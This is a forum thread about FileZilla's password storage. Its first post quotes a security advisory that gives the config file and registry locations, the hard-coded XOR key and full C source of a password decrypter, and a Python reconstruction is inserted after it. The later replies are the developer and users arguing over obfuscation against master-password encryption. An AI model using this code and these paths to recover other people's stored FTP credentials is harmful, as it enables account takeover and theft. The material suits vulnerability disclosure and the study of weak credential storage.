FileZilla Weak Password Encryption

Hester
500 Command not understood
Posts: 4
Joined: 2009-01-08 09:05

FileZilla Weak Password Encryption

#1 Post by Hester » 2009-01-08 09:13

Hi, I'm new here.

I've been using Filezilla FTP Client for a long time but only recently tried out Filezilla FTP Server. I came across this article saying Filezilla FTP Server has weak encryption, but they are talking about versions 2.2.14b and 2.2.15. What about now? What do you think?

Hope to know more about this. I've already tried the server. Found it to be easy to use. Am keen on using it.

http://www.securiteam.com/windowsntfocu ... 2KGVW.html
Vulnerable Systems:
* FileZilla versions 2.2.14b and 2.2.15

FileZilla saves configuration settings in two different locations:
* In an XML file
* In the Windows registry

The method used to save configuration settings depends on the preferences used by the user during the installation of FileZilla. Either way, all configuration settings are stored in cleartext, EXCEPT for the password. However, the password is stored using very weak XOR "encryption" which can be easily reversed.

There exists a problem in the way the XOR encryption is implemented because the same cipher key is always used. This key is hard-coded, which means that anyone can analyze the source code of the application and find it. Of course, this wouldn't be so easy if FileZilla wasn't an open source application.

Once the key is known, an attacker can use it to decrypt the password back to its cleartext form. Because the XOR cryptographic algorithm used is symmetric, the same key is used for both encrypting and decrypting.

As mentioned before, the rest of the configuration settings are all in cleartext. Some information that would be useful for an attacker includes hostname of the server to connect to, default port, and username.

If successfully exploited, this vulnerability will allow an attacker to access FTP (or SFTP) servers with the privileges of the user whose configuration settings were stolen from.

In practice, this vulnerability could be exploited after a machine has been compromised, or by fooling the user into executing malicious code. Such code could dump the configuration settings, decrypt the password/s and send them all to the attacker.

It is common to see many popular trojans out there that exploit weak encryption vulnerabilities of this type. These trojans dump the credentials of popular applications such as Internet Explorer, VNC or even dialup connections. FileZilla could be the next application added to the list for all those trojans with password-dumping features.

This vulnerability is somewhat similar to the one found by Conde Vampiro in VNC 3 back in 1999. It's similar because in both cases we find an open source application using a fixed cipher key to decrypt passwords, thus making it trivial to find the key.

For more information on Conde Vampiro's findings visit: http://www.securiteam.com/securitynews/3P5QERFQ0Q.html

The XML configuration file is found at: %programfiles%\FileZilla\FileZilla.xml
The configuration settings are saved in the registry in:
Hive: HKEY_CURRENT_USER
Key: Software\FileZilla\Site Manager\[site_name]\
Where [site_name] is the name given to the connection by the user.
The password is saved in the previous key as a value with the following properties:
Value: Pass
Type: REG_SZ (null-terminated string)

The cipher key can be found in Crypt.cpp and its value is: FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ

Solution:
Choose "Use secure mode" during the installation (this disables FileZilla from saving passwords), lock down your client machines where the FileZilla client is installed, or update to a patched version which fixes this issue (if available).

Password Decrypter Code:
/*

Filename: filezilla-pwdec.c
Title: FileZilla Client - Weakly encrypted password exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 8th August, 2005
License: GPL
email: m123303[-a-t-]richmond.ac.uk
homepage: http://www.ikwt.com (In Knowledge We Trust)
http://www.adrianpv.com

Description: this tool asks the user for the "encrypted" password and
computes the cleartext version of the password

Other info: compile as a Win32 console application project in Visual C++

Copyright (C) 2005 pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301, USA.

*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cipher key, the constant hard-coded in Crypt.cpp)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE: decimal values representing ASCII chars,
//     every three digits becomes one ASCII char
//     e.g.: 042040063063
//POST: ASCII chars are copied back to buff[]
//      e.g.: *(??
//      the length of the new string is returned
int digit2char(char buff[])
{
    char tmp_buff[4], ascii_buff[MAX_SIZE];
    unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
    for(i=0,j=0;i<strlen(buff);i+=3,++j)
    {
        tmp_buff[0]=buff[i];
        tmp_buff[1]=buff[i+1];
        tmp_buff[2]=buff[i+2];
        tmp_buff[3]='\0';

        n=atoi(tmp_buff);
        ascii_buff[j]=(char)n;
    }
    ascii_buff[j]='\0';
    printf("ascii_buff:%s\n", ascii_buff);
    //memcpy rather than strcpy: a decoded byte may be 000 (NUL) and must
    //still be copied, otherwise the XOR loop below would hit stale digits
    memcpy(buff, ascii_buff, len+1);

    return len;
}

//PRE: buffer containing ASCII chars of cypher
//     (rather than their numeric ASCII value)
//POST: length of cleartext password is returned
unsigned int decrypt(char buff[])
{
    unsigned int i, pos, len;

    len=digit2char(buff);
    //the key offset depends only on the password length, not on any secret
    pos=len%strlen(m_key);

    for (i=0;i<len;i++)
        buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];

    return len;
}

int main(void)
{
    char cypher[MAX_SIZE];
    unsigned int len=0,i=0;

    printf("Enter cypher (encrypted password)\ne.g.: 120125125112000\n->");
    //width limit keeps the input inside cypher[MAX_SIZE]
    scanf("%149s", cypher);
    if(strlen(cypher)%3==0)
    {
        len=decrypt(cypher);
        printf("cleartext password:");
        for(i=0;i<len;++i)
            printf("%c",cypher[i]);
        printf("\n");
    }
    else
    {
        printf("You didn't enter a valid cypher!\n");
        printf("It should be a numeric value whose length is multiple of 3\n");
    }

    printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
    Sleep(SLEEP_TIME);
    return 0;
}
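An added example, not from the advisory, the SecuriTeam tool or FileZilla itself: a Python model of the 2.x storage format as the advisory describes it (fixed key from Crypt.cpp, key offset taken from the password length, three decimal digits per byte). It makes the point the later replies argue: nothing secret goes into the transform, so encoding and decoding are the same fixed function and the stored value should be treated as plaintext and protected by OS access controls. The key constant and digit format come from the advisory above; the assumption that passwords are single-byte (latin-1) text is mine.

```python
# Reconstruction of the FileZilla 2.x password "encryption" from the advisory
# text above (added example, not project code).  KEY is the constant the
# advisory quotes from Crypt.cpp; the latin-1 assumption is ours.
KEY = b"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def _xor_with_fixed_key(data: bytes) -> bytes:
    """XOR each byte with the hard-coded key, starting at offset len % len(KEY).

    No secret is involved: the offset is a function of the length alone and the
    key is a public constant.  XOR is an involution, so applying this twice
    returns the input, which is why the same routine both hides and reveals.
    """
    pos = len(data) % len(KEY)
    return bytes(b ^ KEY[(i + pos) % len(KEY)] for i, b in enumerate(data))


def obfuscate(password: str) -> str:
    """Produce the stored form: three decimal digits per XORed byte."""
    xored = _xor_with_fixed_key(password.encode("latin-1"))
    return "".join(f"{b:03d}" for b in xored)


def deobfuscate(stored: str) -> str:
    """Invert obfuscate(); rejects anything that is not groups of three digits.

    This mirrors the validity check the C tool performs (length multiple of 3),
    and additionally requires digits only and byte values <= 255.
    """
    if not stored.isdigit() or len(stored) % 3 != 0:
        raise ValueError("stored value must be decimal digits in groups of three")
    try:
        xored = bytes(int(stored[i:i + 3]) for i in range(0, len(stored), 3))
    except ValueError as exc:  # a group above 255 is not a byte
        raise ValueError("three-digit group exceeds 255") from exc
    return _xor_with_fixed_key(xored).decode("latin-1")


def is_secret_free_encoding(stored: str) -> bool:
    """Defender check: if the value round-trips with only the public constant,
    the file offers no confidentiality and must be handled as plaintext."""
    return obfuscate(deobfuscate(stored)) == stored
```

The C tool's own sample input 120125125112000 decodes to the password 11111, and the comment example 042040063063 to pass.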

botg
Site Admin
Posts: 31510
Joined: 2004-02-23 20:49
First name: Tim
Last name: Kosse

Re: FileZilla Weak Password Encryption

#2 Post by botg » 2009-01-08 10:51

That advisory is nonsense. In the old 2.x client the passwords are not encrypted, they are merely obfuscated. For this reason it is expected that it is easy to get the plaintext password.
For this reason I dropped the nonsense obfuscation in 3.x and just store the plaintext passwords. It's the task of the operating system to protect your private data.

The server stores passwords in the form of MD5 hashes; those are not reversible.

maathieu
500 Command not understood
Posts: 5
Joined: 2009-09-07 11:22
First name: maathieu
Last name: maathieu

Re: FileZilla client Weak Password Encryption

#3 Post by maathieu » 2009-09-07 11:37

How about implementing a master password system in the FileZilla client, just like the one in Firefox and Thunderbird?

Pros:
- Passwords are not immediately accessible to an unexpected user (laptop/USB key stolen, trojan horse in the machine),
- Only one password required to be remembered in order to access them all,
- Password file can be encrypted using master password as a key, thus immune to "laptop/usb key stolen" attacks and other common social engineering issues (PC goes to maintenance, and so on).

Cons:
- will not work if there is a keylogger or similar software on the machine (but in that case, you're pretty much screwed anyway).

This will not give a false pretense of security (since your passwords ARE protected as long as the attacker doesn't know the master password). And please, it's not the task of the OS to protect your private data. We're talking about Windows here!

botg
Site Admin
Posts: 31510
Joined: 2004-02-23 20:49
First name: Tim
Last name: Kosse

Re: FileZilla Weak Password Encryption

#4 Post by botg » 2009-09-07 14:21

Simply encrypt your home directory. Your login password is then your master password.

Spengbab
500 Command not understood
Posts: 1
Joined: 2009-10-06 03:25
First name: Dave
Last name: Dulihanty

Re: FileZilla Weak Password Encryption

#5 Post by Spengbab » 2009-10-06 03:29

botg wrote: Simply encrypt your home directory. Your login password is then your master password.
I'm sorry, that's an acceptable solution to poorly written software how?

I couldn't count the amount of people who have had their sites hacked because FileZilla makes it easy to capture their passwords. It's gotten to the point where I've stopped recommending FileZilla to customers because of the fact.

Perhaps if you worked in the web hosting industry you might think that security was a little more important.

xicrozxadanz
504 Command not implemented
Posts: 9
Joined: 2009-10-03 11:54
First name: Xicroz
Last name: Xadanz
Location: Nepal

Re: FileZilla Weak Password Encryption

#6 Post by xicrozxadanz » 2009-10-06 04:30

I think weak password encryption is the main problem with FZ. When will the developers' eyes go here???

boco
Contributor
Posts: 24118
Joined: 2006-05-01 03:28
Location: Germany

Re: FileZilla Weak Password Encryption

#7 Post by boco » 2009-10-06 15:04

FileZilla does not encrypt passwords.

maathieu
500 Command not understood
Posts: 5
Joined: 2009-09-07 11:22
First name: maathieu
Last name: maathieu

Re: FileZilla Weak Password Encryption

#8 Post by maathieu » 2009-11-26 14:50

boco wrote: FileZilla does not encrypt passwords.
Firefox does. Thunderbird does. Why is it such a pain to get people to acknowledge that it is a necessity for Filezilla too? If the Firefox guys can code a master password system, surely the FileZilla guys can, too?

etosan
500 Command not understood
Posts: 2
Joined: 2009-12-08 15:04
First name: Martin
Last name: Mišúth

Re: FileZilla Weak Password Encryption

#9 Post by etosan » 2009-12-08 15:39

maathieu, then go on and code it. If it is quality code, it might get accepted by the other devs.
I was using the Firefox master password for some time and frankly I do believe it's bullshit. The OS should take care of that. Even on Windows you can reasonably protect your passwords by granting correct ACLs.
